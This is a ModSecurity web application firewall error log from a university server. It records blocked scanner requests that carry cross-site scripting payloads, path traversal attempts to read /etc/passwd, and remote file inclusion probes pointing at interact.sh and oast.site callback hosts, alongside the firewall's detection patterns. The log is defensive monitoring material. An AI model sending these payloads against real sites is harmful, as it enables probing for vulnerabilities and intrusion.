[Tue Aug 29 11:55:36.246502 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAApHRjYAAAAP"]
[Tue Aug 29 11:55:36.627254 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAoz8IkAAAAS"]
[Tue Aug 29 11:55:37.532041 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAoz8I4AAAAS"]
[Tue Aug 29 11:55:38.127319 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAqSwwUAAAAN"]
[Tue Aug 29 11:55:38.168549 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAApbUlEAAAAh"]
[Tue Aug 29 11:55:38.627432 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAqSwwgAAAAN"]
[Tue Aug 29 11:55:39.852791 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16S8Co-f0AAApbUlsAAAAh"]
[Tue Aug 29 11:55:41.918697 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqSwyUAAAAN"]
[Tue Aug 29 11:55:43.858709 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAq5@EkAAAAK"]
[Tue Aug 29 11:55:43.920550 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAApbUngAAAAh"]
[Tue Aug 29 11:55:44.603581 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAq@sX4AAAAM"]
[Tue Aug 29 11:55:44.694241 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAolKv4AAAAe"]
[Tue Aug 29 11:55:45.549498 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAqY6H8AAAAr"]
[Tue Aug 29 11:55:46.533436 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAq5@FQAAAAK"]
[Tue Aug 29 11:55:46.635182 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqY6IwAAAAr"]
[Tue Aug 29 11:55:46.664825 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAq-HYIAAAAT"]
[Tue Aug 29 11:55:46.719093 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAApbUoQAAAAh"]
[Tue Aug 29 11:55:47.734473 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqqtj4AAAAA"]
[Tue Aug 29 11:55:48.530404 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqSw0oAAAAN"]
[Tue Aug 29 11:55:48.540682 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAApbUowAAAAh"]
[Tue Aug 29 11:55:52.012158 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAApbUpgAAAAh"]
[Tue Aug 29 11:55:52.032280 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAApbUpkAAAAh"]
[Tue Aug 29 11:55:52.100081 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb08fr3u8rxumuqk.oast.site found within TX:1: cjmnijtjmimvgniikdb08fr3u8rxumuqk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqY6LUAAAAr"]
[Tue Aug 29 11:55:52.606389 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb088oziit3c57oq.oast.site/ found within TX:1: cjmnijtjmimvgniikdb088oziit3c57oq.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAq4fYcAAAAJ"]
[Tue Aug 29 11:55:52.667740 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAAolKyUAAAAe"]
[Tue Aug 29 11:55:53.672453 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqY6MEAAAAr"]
[Tue Aug 29 11:55:53.817138 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArC7aYAAAAW"]
[Tue Aug 29 11:55:53.824520 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0r64mun9kcurib.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0r64mun9kcurib.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAqSw1UAAAAN"]
[Tue Aug 29 11:55:55.639476 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqTvzsAAAAa"]
[Tue Aug 29 11:55:56.621522 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq5@HwAAAAK"]
[Tue Aug 29 11:55:56.733235 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqeFfgAAAAx"]
